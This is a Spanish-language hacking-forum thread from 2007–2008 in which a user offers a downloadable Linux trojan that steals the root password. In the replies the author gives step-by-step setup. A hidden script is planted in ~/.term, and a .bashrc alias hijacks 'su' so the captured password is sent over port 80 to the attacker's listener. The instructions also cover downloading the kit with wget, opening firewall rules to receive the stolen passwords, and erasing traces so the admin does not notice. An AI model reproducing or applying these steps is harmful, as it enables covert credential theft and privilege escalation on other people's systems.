elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
27 Mayo 2012, 20:28  


Tema destacado: Deseas probar algunas mejoras a la interfaz del foro? Prueba cake! acerca de

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado
| | |-+  Hacking Linux/Unix (Moderadores: kamsky, TRICKY, berz3k)
| | | |-+  troyano roba contrasenas -- By averno		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: troyano roba contrasenas -- By averno  (Leído 6,005 veces)
TRICKY
The "Tricky" ..
Moderador
***
Desconectado Desconectado

Mensajes: 1.605


Ver Perfil
troyano roba contrasenas -- By averno
« en: 21 Octubre 2007, 20:18 »
 que tal.

 El titulo del asunto es bien flameante, pero es un pegote.
 Pues no sabia muy bien donde ponerlo, y mucho me temo que ter-
 minara en otro subgenero.
 Al grano: Ayer noche, fumando yelba velde e indagando entre mis
 penumbras, decidi ... ponerme a programar!! En serio, mi parien-
 ta se ha io por una semana y estoy al fin haciendo lo que quiero!
 y trankilo.

 Pues os presento a un "troyano" para Linux. Este consta de dos
 partes: un servidor que debeis de dejar corriendo en vuestra
 makina ( bindeara al puerto 80, ya que el host obejtivo dejara
 salir este tipo de conexiones .. ) y un cliente, que debeis de
 dejar colgado en la makina objetivo. Claro que este "troyano" re-
 kiere que tengas una kuenta registrada de usuario normal en la
 makina objetivo. Debeis echarle un vistazo a los sources codes,
 ya que meto komentarios vitales para elaborar el proceso.
 
 // Acerca del arhivo que os paso:
 Pues esta en formato comprimido .tar.gz, asi que para descompri-
 mirlo ( en el objetivo .. ) haced:
 tar -zxvf averno.tar.gz

 En la makina objetivo, borrad los archivos descomprimidos
 "passwds.txt", "sock_recv.c" y "sock_recv", ya que estos seran
 solamente relevantes en VUESTRA MAKINA. O sea, en la makina ob-
 jetivo ( en la que tendreis un login de usuario ) solo debe kedar
 ( despues de la descompresion ) el archivo passwd-stealer.
 En realidad podeis "colocar" el archivo komo kerais..

 Komo dije, es vital que editeis el script ( vi passwd-stealer )
 para ver los komentarios.
 Se que puede surgir el pensar.. "joder, para que la idea de crear
 sockets para el envio de la password??" "que mas da, si ya tengo
 una cuenta local, puedo entrar y leer yo mismo el archivo."
 "incluso mas, si el admin tiene reglas de LOG en el firewall o
 logs via syslogd.. puede que tenga mi IP a la que se mando el pass".
 Todo esto es verdad, pero..
 - si dejas el anzuelo y no borras komo yo todo acto del troyano
 ( borrar la linea en ~/.bashrc y el directorio ~/.term ) puede
 ser que el admin, al haber notado algo extranio en el comporta-
 miento de "su", decida mirar exhaustivamente y encuentre dichos
 anzuelos ( incluso antes de que tu vuelvas para recogerlos! ).
 Lo de la IP no es muy probable, ya que hacemos una conexion sa-
 liente hacia el puerto 80. Si el admin estuviera corriendo un
 Caching Proxy, seria diferente pero komo digo, no kreo que diera
 con todo el entramado.

 Bueno, me dejare kosas en el tintero, y tampoko es pa tanto el
 "trojanito".

 Aki os dejo el link de descarga:

 http://www.easy-share.com/1905301976/averno.tar.gz   /* actualizado */
 Bueno, lo importante es participar, asi que saludos y suerte.

 
 P.D: el script no mata ningun proceso (  syslogd .. klogd )
 P.D2: El server ( en tu makina ) lo he puesto para que escuche
      en el puerto 80, y tras ello sako por el stdout la IP
      que konecta y, automaticamente apendo ( "a" ) a un fichero
      passwds.txt las relaciones IP:contrasenas que van llegando.
« Última modificación: 21 Mayo 2009, 20:29 por averno » En línea
"La envidia es una declaración de inferioridad"
Napoleón.
TRICKY
The "Tricky" ..
Moderador
***
Desconectado Desconectado

Mensajes: 1.605


Ver Perfil
Re: troyano roba contrasenas -- By averno
« Respuesta #1 en: 26 Octubre 2007, 20:02 »
 que tal.

 Komo veis, al final se movio y con amenazas de borrado!! ein???!

 Bueno, ya me he puesto en kontacto kon nuestro amigo Colaborador que movio
 el post y me ha explikado el motivo de ese komentario suyo del borrado.
 Me ha explikado que es un simple komentario suyo al no gustarle los troyanos.

 Realmente, me habia asustado: krei que, sin presuncion ninguna, habia faltado
 al respeto categoriko del trato de comunidad. Pff...

 El kaso es que animo a que surjan ideas y, como no, a algun tipo de feedback
 o simple comentario.

 Saludos.
En línea
"La envidia es una declaración de inferioridad"
Napoleón.
duchov

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: troyano roba contrasenas -- By averno
« Respuesta #2 en: 14 Febrero 2008, 13:29 »
hola averno me ha gustado mucho tu troyano pero no soy capaz de utilizarlo he copiado el archivo en la maquina q quiero ejecutar, en el passwd-stealer pones q hay q copiar una linea en el .bashrc, lo q quiero saber es si tiene q ser en mi maquina o en la q quiero entrar, una vez hecho esto como ejecuto el programa o troyano y desde donde , tambien donde sale reflejado la contraseña, por favor contextame si no te importa pronto. si es posible hazlo a [ANTISPAM]. gracias
« Última modificación: 14 Febrero 2008, 13:33 por ANELKAOS » En línea
TRICKY
The "Tricky" ..
Moderador
***
Desconectado Desconectado

Mensajes: 1.605


Ver Perfil
Re: troyano roba contrasenas -- By averno
« Respuesta #3 en: 14 Febrero 2008, 16:44 »
 que tal.

 Bueno, ante todo gracias por el kumplido :_).
 
 Antes que nada: Por favor lee bien los sources; ya que hace un tiempo ya que
 kodee esa tool. Pero bueno, a ver si te puedo aklarar algo kon lo que recuerdo.

 /**** Estoy sin inet, y desde un cyber y kon poko tiempo ... ******/

 Bueno, en el .bashrc de la makina objetivo en la cual deberias tener una
 cuenta legalmente creada o ilegalmente creada, deberias de poner una ultima
 linea parecida a esta:

 alias su="source $HOME/.term/.passwd-stealer"

 Esto significa que el nombre del script es "passwd-stealer" y que se encuentra
 oculto en un directorio dentro del $HOME tambien oculto ".term" ...
 El script "passwd-stealer" se ejecutaria automaticamente, una vez r00t o alguien
 con "potestad" ( si hicieran un /bin/su no funcionariamos bien.. ) ejecutase "su"
 dentro de nuestro directorio $HOME. Ahi, entraria en juego la linea introducida
 por nosotros en $HOME/.bashrc; la kual haria que, en vez de /bin/su, se ejecute
 nuestro troyano en $HOME/.term/.passwd-stealer ( ejecutando al segundo intento
 el real /bin/su ).
 Tu en tu makina, deberias de tener corriendo el programa sock_recv; que no es
 mas que un socket a la escucha de conexiones en el puerto 80 para mas fiabilidad
 de conexiones: ( atencion a tu router o firewall! )

 server.sin_port = htons(80);

 El kaso es que, si tienes un servidor http corriendo, pues kambia ese puerto en
 esa linea del source por otro. Asegurate de configurar tu router o firewall de
 manera que puedas recibir conexiones por dicho puerto. Imaginando que no tienes
 router y utilizas iptables del modulo Netfilter komo firewall, podrias incluir una
 regla en el firewall tal:

 iptables -t filter -A INPUT -i eth0 -p tcp --dport 80 -s IP_DEL_OBJETIVO -j ACCEPT

 /sbin/service iptables save  # --> para Red Hat

 Esto supone que tienes una Politica de Rechazo para todos los paketes entrantes,
 y que TU konfiguras tu firewall para ver que paketes entran por tu interfaz de Red.
 O sea, se supone que, por tu seguridad, has configurado tu firewall kon una
 regla tal:

 iptables -P INPUT DROP  # o algo asi

 Bueno, en la linea primera el puerto 80 refiere al puerto que hayas escogido para
 las conexiones ( por defecto el 80 ).

 En resumen: en un principio, debes de bajarte en la makina objetivo el .tar.gz
 del link que te ofrezco ( via wget en /tmp o komo puedas :)).
 Descomprime las fuentes y copia/mueve el script "passwd-stealer" al directorio
 deseado ( $HOME/.term/ -- kedando asi: $HOME/.term/.passwd-stealer ).
 Tras ello, deberias de poner la anteriormente citada linea en el $HOME/.bashrc ..

 Ahora, kreo que lo que keda es esperar a que r00t ( o alguien kon potestad ) haga
 descuidadamente un "su" desde tu directorio $HOME. Es entonces kuando,
 automagicamente, el escript se ejecutaria y pasaria la data ( password ) al
 socket que tendrias a la escucha tu en tu makina en el puerto 80 ( o el elegido ).
 
 Kabe rekalkar varias kosas komo: NO TE OLVIDES de darle permisos de
 ejecucion al script! O sea, suponiendo que nos enkontrasemos en el directorio
 $HOME/.term, y que dentro de este ya tenemos kopiado el script .passwd-stealer:

 chmod 777 .passwd-stealer

    o

 chmod 700 .passwd-stealer  # ya que sera r00t el que lo ejecute..

 Otra kosa es que no debes olvidar que el script intenta borrar la ultima linea kreada
 en el .bashrc despues del supuesto robo de la kontrasenia. Esto es, que si por un
 casual no recibes la password y el scriptr ha sido ejecutado, deberias de reponer
 esa misma linea en el $HOME/.bashrc de nuevo.

 No se que mas decirte, solo desearte Suerte.

 P.D1: Ante kualkier otra duda, komentamelo.
 P.D2: En el directorio en TU makina en el que estes korriendo el sock_serv,
         se iria kreando un archivo de texto kon los resultados.
 
 
« Última modificación: 14 Febrero 2008, 16:51 por averno » En línea
"La envidia es una declaración de inferioridad"
Napoleón.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
GpCode el troyano que roba los archivos del PC y pide un rescate, vuelve más ...
Noticias 		wolfbcn 6 1,361 Último mensaje 6 Diciembre 2010, 08:40
por Constance
Ayuda Virus en mi pc roba contraseñas ?????
Seguridad 		yimycol 4 382 Último mensaje 27 Marzo 2012, 20:38
por yimycol
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines